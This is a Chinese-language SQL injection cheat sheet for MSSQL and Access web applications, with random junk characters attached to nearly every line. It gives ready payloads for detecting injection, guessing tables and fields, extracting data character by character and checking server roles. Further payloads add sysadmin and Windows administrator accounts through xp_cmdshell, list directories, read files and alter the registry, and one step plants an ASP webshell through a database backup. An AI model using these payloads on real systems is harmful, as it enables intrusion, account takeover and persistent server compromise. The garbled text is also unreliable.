1.判断是否有注入;and 1=1 ;and 1=2 H�HZGu8tzt
2.初步判断是否是mssql ;and user>0
wv6rjg:7
R,
J(]ew��
3.注入参数是字符'and [查询条件] and ''=' Pr�Zs@� Y�
Qgel^"t�]i
4.搜索时没过滤参数的'and [查询条件] and '%25'=' q�|r/%[[!o
h�j<h]dh�p
5.判断数据库系统 |�J_kS90�=
�e�n1N�F�P
;and (select count(*) from sysobjects)>0 mssql ar���!`�8"
/HiRbwQK�#
;and (select count(*) from msysobjects)>0 access <O]�T�M-�h
;`�(l)X+7�
.w@o%A��O_
�16�38U��1
6.猜数据库 ;and (select Count(*) from [数据库名])>0 /Ayo78P�i
chQC�l3&e^
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 Pv>W`/*_,s
=�L�l:Ba Q
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0
A�D=�qB5:
�`6�2iW3y
9.(1)猜字段的ascii值(access) WF��!u2E+�
#�+�<"`}]N
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 |o�L}c!0vs
}q��k8^W�{
(2)猜字段的ascii值(mssql) �FkS$x'~2$
��(n>g��C
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 x U1���](O
~dpU D���F
10.测试权限结构(mssql) L�]�_1��z�
!}[,ODJ4 d
�q!sazVaDp
<$�8`�]e?I
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- l^ Q�-KUI
Oapv�`Z\i~
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �]l~TI8�gC
2�^�*a$�OJ
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- |d@�%Vb�_�
wk'12r6=(-
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- DviR�D[+q"
+wwb+aG6�{
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ��r�d�a�/�
?df*Y�5I2�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �N�ukc�BH�
m,T�N%*U!�
;and 1=(select IS_MEMBER('db_owner'));-- 2A5R�3x=�\
��Ac'0���
2�c
Pd$��j
LZ�?z5�U:
11.添加mssql和系统的帐户 7��
��B<�
)�fRZ}7k:
;exec master.dbo.sp_addlogin username;-- -F�+
)N$CW
;exec master.dbo.sp_password null,username,password;-- I�>(�3\z4s
U�h9p�,A�V
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- p;P"mp�\'�
4=T.�r�VS[
;exec master.dbo.xp_cmdshell 'net user username password k�/hD2tBLu
I�&jiH�)��
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- R;6$lO8C&�
�HoTg7/iK�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ?hXe�ZB+b4
VN5UJ�!$?J
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- AxsTB9��/�
~eVq� F�c�
�gHB*u!w7Z
YEg(Q�On3Q
12.(1)遍历目录 a___SYl
'K
3t*e|Ih&j5
;create table dirs(paths varchar(100), id int) ;E!(W=]*F
,k,RX���gQ
;insert dirs exec master.dbo.xp_dirtree 'c:\' �\Y4��>_Mk
^iH��wv*ss
;and (select top 1 paths from dirs)>0 Al��0
i{.V
q$<��M���2
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 08�+cN��T�
!��ULU#2'1
npj_i /&g
��['*{f(AI
(2)遍历目录 EGY'a*]�cU
�r&MHw�w1i
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- h8�i�kM&fl
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ��|3a1hCxt
%/K'�VE6pb
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 !b�PsJbIo>
�]z�%X%�wL
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 l$1��z%�|I
>\/H�2��j
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 z`?{5v -Qs
HkP')= s�a
#�lf3$Tm D
_0v�+�g1�x
13.mssql中的存储过程
x=�/`W^t2
J�B�_<H�aj
xp_regenumvalues 注册表根键, 子键 wa�#$9�p~Q
"M� GX(S�Q
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 RSK~<Y@]q{
4)cQU.(*�k
xp_regread 根键,子键,键值名 J�0 ��[^hH
N�x%�]dO�a
;exec xp_regread �=u*\�P!$
z<T(af�M{*
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 � Xf4 ����
TpH��vZ�]c
xp_regwrite 根键,子键, 值名, 值类型, 值 qH�GwD20 ~
9L`�5r$��/
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �="k9�
y��
015
;'V#we
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 g�o6���XUe
c�7E|GZ2Hc
xp_regdeletevalue 根键,子键,值名 /8)-j�}gZa
-w[j`}([P9
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 0`�L��R!X�
;2NJ�kn9t
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �];3]/�b)&
u�p# R9
d|
y@�T��0
jI
e[Tu.�$f-
14.mssql的backup创建webshell /M0�A9Z�T[
p#]D-�?CM)
use model �UdI�l5P��
l��BYc(cr�
create table cmd(str image); mM��z^�I7$
F+�c4v A})
insert into cmd(str) values (''); ��(oftq!X2
o'Uaz*-p�o
backup database model to disk='c:\l.asp'; oy;�g;�dtq
�cE|Z=}4I7
!x�IK<H{*�
�
MeP,8,n'
15.mssql内置函数 k3 YDnMRA9
(=�T%eJ61
;and (select @@version)>0 获得Windows的版本号 P�2�j"L#%�
�,?�3)L
��
;and user_name()='dbo' 判断当前系统的连接用户是不是sa w�;p�:��4`
$4�*w�K@xu
;and (select user_name())>0 爆当前系统的连接用户 ^#V7\;v$�G
aw3� oG?3I
;and (select db_name())>0 得到当前连接的数据库 eB]�R<a�60
�9�On0om>�
T�HOXs;
k0
f4b`*��KGf
16.简洁的webshell RRa�sX;�zK
HW�@r1��[Y
use model ;REl�G>#$�
�68!W~%?pR
create table cmd(str image); f3p)Q<H>`(
�?}n\&�|+
insert into cmd(str) values (''); .!�B>pp(�9
Fxk�xV GZ"
backup database model to disk='g:\wwwtest\l.asp';
